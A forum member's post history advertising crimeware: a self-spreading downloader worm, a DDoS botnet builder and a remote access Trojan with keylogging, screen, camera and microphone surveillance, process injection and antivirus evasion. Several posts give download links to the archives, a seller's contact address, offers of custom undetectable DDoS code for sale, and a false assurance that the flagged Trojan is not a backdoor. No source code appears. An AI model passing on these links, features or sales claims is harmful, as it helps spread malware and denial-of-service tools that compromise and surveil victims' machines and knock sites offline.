Jump to content

finlay

Members
  • Posts

    6
  • Joined

  • Last visited

Posts posted by finlay

  1. MS-DRT worm Download infection Limited version of the test

    U disk infection

    Hard infection

    Loop downloads

    Into the IE process

    Intranet infection

    Functions

    Software functions and features:

    1. Shielding that those who download a large number of infections and

    other malicious programs, you can use this program to run more

    smoothly.

    2.TXT regular download is complete, immediately remove the download

    link in the address of the cache, better protection of the server to

    download addresses hidden.

    3. Unlimited download key, txt download at any time replace the

    connection method.

    TXT reading using the method: the txt upload it to the generator filled

    the corresponding address, the first line of txt file, write the

    address to download the program

    .

    Format: "http://www.xxx.com/xxx.exe"

    Line 2 download write programs to save the file name of the machine

    Format: "Test.exe"

    Click here if a number of cycles. Supports unlimited entries will be

    written txt file upload to your space,

    Configuration and then write on his office's Web site can click on

    configuration.

    (Not including the two side pairs of quotation marks, top grid to write

    in front can not have spaces)

    The program has screened a large number of soft-kill, if the first

    download is unsuccessful, please restart the

    The computer can continue the download was successful!

    Txt format, fully configured model

    °Ù¶È--ÄúµÄ·ÃÎʳö´íÁË

    mh.exe

    °Ù¶È--ÄúµÄ·ÃÎʳö´íÁË

    zt.exe

    °Ù¶È--ÄúµÄ·ÃÎʳö´íÁË

    wow.exe

    Statistical Papers need to contact

    Need to purchase unlimited VIP version of the contact

    hackxf@live.cn

    MS-DRT Trojan-?? HOME

    http://uploadingit.com/????

    Free File Hosting - File Dropper: File Host for Mp3, Videos, Music, Documents.

    Download

    releases/3475d1259252324-ms-drt-worm-downloadinfection-limited-version

    -test-ms-drt-download-worm-infection.rar'>http://www.opensc.ws/attachments/trojan-malware-

    releases/3475d1259252324-ms-drt-worm-downloadinfection-limited-version

    -test-ms-drt-download-worm-infection.rar

    http://www.filedropper.com/ms-drtdownloadworminfection

  2. MS_Zombie Attack DDOS Introduction:

    n this is a Denial of Service DDOS stress testing software MSN_Zombie

    attack DDOS)

    etwork traffic control and system control technology costs, speed, do

    not plug, hidden, and powerful attacks, such as outstanding performance

    characteristics, can fully exploit the weaknesses of the target

    audience, with the DDOS-DDOS DDOS Firewall (introduced later) to be

    protective. The protection of corporate Web site or host security.

    Strong performance of the attack

    Support for custom packet TCP / UDP attack to attack in support of

    conventional host, such as multiple TCP connections / UDP floods at /

    ICMP / IGMP / SYN, etc. to support the Web site attacks, such as HTTP

    and more connected / HTTP download / FTP multi-connection / FTP

    download / CC attacks in support of win98/2k/xp/xp-sp2/vista system.

    Automatic on-line chickens

    A variety of ways to support the on-line mechanism for the broilers,

    such as Dynamic Domain Name / URL steering / FTP upload documents IP /

    fixed IP and so on, through a simple configuration can be automatically

    generated on the server. Server has powerful features automatic re-

    connection will be able to automatically search for hosts outside the

    network address, the automatic use of agents, to support the LAN

    control, never dropped.

    Hidden performance

    Encryptionthe protection of client services can be injected into any

    process, such as explorer, svchost, etc., NT system service can be

    generated automatically activated disguised.

    First-class attack speed

    Server-side part of the code directly from the completion of the

    compilation, in order to protect as much as possible at the same time

    functional compact, perfect attack speed by optimizing the speed and

    thread, to enhance the capacity of the best attack

    Welcome to the forum: ºÚ¾ÖºÚ¿ÍÂÛ̳-ºÚ¿Í¼¼Êõ:¼¼ÊõÌÖÂÛ,Éø͸,©¶´,ºÚ¿ÍÈí¼þ,ºÚ¿Í»ùµØ - Powered by Discuz!

    2.jpg

    Sorry for my poor english

    Download Address:

    http://www.hackju.cn/msn.rar

    Hello, can be customized professional business version of DDOS attack

    code written by an independent anti-virus software can not be killed

    but also a more formidable power ..... super cheap price of more

    powerful than others are discount software cheap attacks.

    Contact my MSN: hackxf@live.cn Thank you!

    MS-DDOS attack latest version of an increase of remote file management.

    Video surveillance. Screen monitor. Advanced features such as remote

    shell ...

    The intensity of attacks is a free version of the 3-fold, and

    supports 16 kinds of super-network attacks

    by Details please visit: http://www.hackju.cn/msn.htm

    As a result of the use of too many people, it has been their anti-virus

    software as Trojan horse killing,

    So this is normal, not the back door or Trojan horse program, please

    rest assured that use.

  3. MS-DRT Trojan RAT

    The new concept of remote control software architecture, including

    domestic and international, some excellent use of architectural

    concepts. Entirely through the firewall and a variety of security

    software. And support for reverse connections, do not need to know the

    server's IP address of the remote management that can be used to

    achieve a variety of network environments. Without a back door server

    program, the algorithm in all the world's leading encrypted data

    transmission, to ensure maximum security of the server computer.

    Convenience of a full-featured remote control allows you to fully enjoy

    the fun of document management.

    ?1? File Management

    ?2? screen monitors

    ?3? key logger

    ?4? System Management

    ?5? session management

    ?6? Video Surveillance

    ?7? voice monitoring

    ?8? EXE plug-in

    ?9? 3389 pairs of open -

    ?10? Agent Function

    ?11? port mapping

    ?12? perfect support for Unicode

    ?13? to add API Search Engine

    ?14? through LAN proxy

    ?15? export public network IP list

    ?16? cluster control

    Low-power monitoring capabilities, allows you to ease operation

    Software with the screen monitor and camera monitoring capabilities,

    the use of this feature to the computer's configuration requirements is

    not high. Network transmission are high compression ratio of

    compression algorithms. Makes the network data packet transmission

    optimization to further improve overall performance and controllable.

    The control client will automatically clean up the memory, will take up

    memory space without the need for time to release and clear, so that

    program memory

    DanisH

    Download

    MS-DRT Trojan-?? HOME

  4. MSN_Zombie Attack DDOS Introduction:

    n China this is a Denial of Service DDOS stress testing software MSN_Zombie attack DDOS)

    etwork traffic control and system control technology costs, speed, do not plug, hidden, and

    powerful attacks, such as outstanding performance characteristics, can fully exploit the

    weaknesses of the target audience, with the DDOS-DDOS DDOS Firewall (introduced later) to be

    protective. The protection of corporate Web site or host security.

    Strong performance of the attack

    Support for custom packet TCP / UDP attack to attack in support of conventional host, such as

    multiple TCP connections / UDP floods at / ICMP / IGMP / SYN, etc. to support the Web site

    attacks, such as HTTP and more connected / HTTP download / FTP multi-connection / FTP download /

    CC attacks in support of win98/2k/xp/xp-sp2/vista system.

    Automatic on-line chickens

    A variety of ways to support the on-line mechanism for the broilers, such as Dynamic Domain Name /

    URL steering / FTP upload documents IP / fixed IP and so on, through a simple configuration can be

    automatically generated on the server. Server has powerful features automatic re-connection will

    be able to automatically search for hosts outside the network address, the automatic use of

    agents, to support the LAN control, never dropped.

    Hidden performance

    Encryptionthe protection of client services can be injected into any process, such as explorer,

    svchost, etc., NT system service can be generated automatically activated disguised.

    First-class attack speed

    Server-side part of the code directly from the completion of the compilation, in order to protect

    as much as possible at the same time functional compact, perfect attack speed by optimizing the

    speed and thread, to enhance the capacity of the best attack

    Welcome to the forum: ºÚ¾ÖºÚ¿ÍÂÛ̳- Ô­ºÚ¿Í¼¼ÊõÁªÃË--ºÚ¿Í¼¼Êõ£¬Ä¾Âí²¡¶¾£¬ÓÅ»¯½»Á÷£º´òÔìרҵºÚ¿Í¼¼ÊõÂÛ̳ - Powered by Discuz!

    2.jpg

    Sorry for my poor english

    Download Address:

    http://www.hackju.cn/msn.rar

    Hello, can be customized professional business version of DDOS attack code written by an

    independent anti-virus software can not be killed but also a more formidable power ..... super

    cheap price of more powerful than others are discount software cheap attacks.

    Contact my MSN: hackxf@live.cn Thank you!

    MSN-DDOS attack latest version of an increase of remote file management. Video surveillance.

    Screen monitor. Advanced features such as remote shell ...

    The intensity of attacks is a free version of the times, and in support of 16 kinds of attacks.

    by MSNT-DRTÖ÷Ò³

  5. MSN DDOS attack Starter Edition

    1. To strengthen the flow of the attack mode.

    2. To strengthen the SYN packet, the host can achieve SP2 category SYN.

    3. To strengthen the CC attack, attack web servers to normal, but the site shut down.

    4.HTTP empty GET request, is also a CC attack, special attack site.

    Debris 5.UDP attacks, so that the firewall once again difficult to defense.

    6. The attack software can control the size of the thread.

    7. To achieve at the same time attacks on multi-station, self-distribution of the number of

    chickens in each target group.

    8. The game to attack mode, the gateway to connect a number of specialized brush (non-dummy).

    9. Routers gateway attack mode, Internet cafes, as well as the server could not escape black

    hands.

    10.CC attacks, as well as the forum for a dynamic web site good results.

    11. Manikin attack mode over the gateway,

    Removed a lot of functionality is not complete and perfect version

    Streamlined version of English is not very good I am sorry that the Chinese

    Download Address

    http://www.hackju.cn/ddos.rar

    Hello, can be customized professional business version of DDOS attack code written by an

    independent anti-virus software can not be killed but also a more formidable power ..... super

    cheap price of more powerful than others are discount software cheap attacks.

    Contact my MSN: hackxf@live.cn Thank you!

    MSN-DOOS attack software: VIP up-to-date version of the new remote control. Document Management.

    Screen monitor. Video surveillance. And advanced features such as remote shell

    The intensity of attacks is a free version of the times, and in support of 16 kinds of attacks.

    by MSNT-DRTÖ÷Ò³

    3.jpg

×
×
  • Create New...